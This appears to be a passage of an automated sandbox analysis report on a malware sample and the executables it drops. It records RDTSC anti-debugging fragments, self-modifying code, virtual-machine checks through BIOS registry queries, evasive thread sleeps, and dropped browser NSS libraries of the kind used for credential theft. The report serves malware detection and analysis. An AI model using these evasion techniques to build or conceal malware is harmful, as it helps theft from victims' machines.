Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1128D97 second address: 1128DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1128DA0 second address: FAEA3C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jng 00007F40B477E792h 0x00000011 pop eax 0x00000012 jmp 00007F40B477E792h 0x00000017 push dword ptr [ebp+122D12C9h] 0x0000001d call 00007F40B477E78Dh 0x00000022 jmp 00007F40B477E78Ah 0x00000027 pop edx 0x00000028 call dword ptr [ebp+122D17FBh] 0x0000002e pushad 0x0000002f sub dword ptr [ebp+122D1A10h], ebx 0x00000035 xor eax, eax 0x00000037 jmp 00007F40B477E794h 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 mov dword ptr [ebp+122D1A10h], edx 0x00000046 mov dword ptr [ebp+122D27F2h], eax 0x0000004c jmp 00007F40B477E797h 0x00000051 mov esi, 0000003Ch 0x00000056 pushad 0x00000057 mov dword ptr [ebp+122D1886h], esi 0x0000005d xor dword ptr [ebp+122D1886h], ecx 0x00000063 popad 0x00000064 clc 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jmp 00007F40B477E78Eh 0x0000006e lodsw 0x00000070 jmp 00007F40B477E791h 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 sub dword ptr [ebp+122D1A10h], ebx 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 jnp 00007F40B477E79Fh 0x00000089 push eax 0x0000008a push eax 0x0000008b push edx 0x0000008c js 00007F40B477E78Ch 0x00000092 jl 00007F40B477E786h 0x00000098 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1128EDF second address: 1128EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1128EE3 second address: 1128EED instructions: 0x00000000 rdtsc 0x00000002 jg 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1128EED second address: 1128EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1128F51 second address: 1128F5E instructions: 0x00000000 rdtsc 0x00000002 je 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1129045 second address: 112904F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F40B515FBF6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1129111 second address: 112919A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F40B477E799h 0x0000000e nop 0x0000000f jmp 00007F40B477E793h 0x00000014 push 00000000h 0x00000016 mov di, E869h 0x0000001a push FDA12128h 0x0000001f jmp 00007F40B477E78Fh 0x00000024 add dword ptr [esp], 025EDF58h 0x0000002b mov dword ptr [ebp+122D2B60h], ebx 0x00000031 push 00000003h 0x00000033 mov ecx, 73011411h 0x00000038 mov si, 9F92h 0x0000003c push 00000000h 0x0000003e jnc 00007F40B477E78Bh 0x00000044 mov edi, 0D22FDEDh 0x00000049 push 00000003h 0x0000004b mov edx, esi 0x0000004d push CD1BDBBCh 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jo 00007F40B477E786h 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 112919A second address: 112919F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 112919F second address: 11291D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E790h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 0D1BDBBCh 0x00000010 sub edx, 6A2CE8A5h 0x00000016 lea ebx, dword ptr [ebp+1244DCCFh] 0x0000001c add edi, dword ptr [ebp+122D2BC2h] 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jg 00007F40B477E788h 0x0000002b push edi 0x0000002c pop edi 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1148938 second address: 114893E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114893E second address: 1148976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E795h 0x00000009 popad 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d jmp 00007F40B477E799h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1146A41 second address: 1146A4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1146A4F second address: 1146A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F40B477E786h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1146E49 second address: 1146E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1146E51 second address: 1146E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1146E57 second address: 1146E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1146F97 second address: 1146FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F40B477E786h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1146FA1 second address: 1146FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007F40B515FBF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 11472AE second address: 11472B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 11472B5 second address: 11472C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jl 00007F40B515FBF6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 11476B6 second address: 11476BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 11476BA second address: 11476C2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 11476C2 second address: 11476C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 11476C8 second address: 11476CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 11476CC second address: 11476D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1147831 second address: 114783D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBFEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114783D second address: 114784D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F40B477E78Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114784D second address: 1147853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1147853 second address: 114785F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F40B477E786h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114785F second address: 114787F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jc 00007F40B515FBF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 113FE5E second address: 113FE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 11484F3 second address: 11484FD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1148747 second address: 114874D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114874D second address: 1148751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1148751 second address: 1148755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1148755 second address: 1148774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FC06h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1148774 second address: 1148787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1148787 second address: 11487C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F40B515FC08h 0x0000000f jmp 00007F40B515FC07h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 11487C0 second address: 11487CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F40B477E786h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114BB4D second address: 114BB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114BB5C second address: 114BB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114BB60 second address: 114BB86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B515FC03h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114BB86 second address: 114BB9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007F40B477E786h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114BB9C second address: 114BBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114BBA1 second address: 114BBA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 114CD3D second address: 114CD41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1116C08 second address: 1116C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B477E786h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 3DEB9C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 57E679 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 57E30B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5A760E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6086E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Special instruction interceptor: First address: FAEA86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Special instruction interceptor: First address: FAC59E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Special instruction interceptor: First address: 1172BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Special instruction interceptor: First address: 11D36CA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 4FEA86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 4FC59E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 6C2BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 7236CA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Special instruction interceptor: First address: A81CC9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Special instruction interceptor: First address: A81C2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Special instruction interceptor: First address: C20BC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Special instruction interceptor: First address: C1FB1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Special instruction interceptor: First address: A7F1EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Special instruction interceptor: First address: CAB5EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Special instruction interceptor: First address: 19DF01 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Special instruction interceptor: First address: 34ADD3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Special instruction interceptor: First address: 376624 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Special instruction interceptor: First address: 1A3335 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Special instruction interceptor: First address: 9FEB9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Special instruction interceptor: First address: B9E679 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Special instruction interceptor: First address: B9E30B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Special instruction interceptor: First address: BC760E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Special instruction interceptor: First address: C286E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Special instruction interceptor: First address: E01CC9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Special instruction interceptor: First address: E01C2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Special instruction interceptor: First address: FA0BC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Special instruction interceptor: First address: F9FB1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Special instruction interceptor: First address: DFF1EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe Special instruction interceptor: First address: 102B5EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Special instruction interceptor: First address: E9EA86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Special instruction interceptor: First address: E9C59E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Special instruction interceptor: First address: 1062BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Special instruction interceptor: First address: 10C36CA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Memory allocated: 5040000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Memory allocated: 52C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Memory allocated: 51E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Code function: 4_2_050400EB rdtsc 4_2_050400EB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 7614
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 892
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe TID: 7532 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7520 Thread sleep count: 78 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7520 Thread sleep time: -156078s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7508 Thread sleep count: 71 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7508 Thread sleep time: -142071s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7616 Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7512 Thread sleep count: 79 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7512 Thread sleep time: -158079s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7504 Thread sleep count: 73 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7504 Thread sleep time: -146073s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 7172 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 3320 Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 1596 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 3844 Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 2256 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4456 Thread sleep count: 69 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4456 Thread sleep time: -138069s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3688 Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3688 Thread sleep time: -136068s >= -30000s
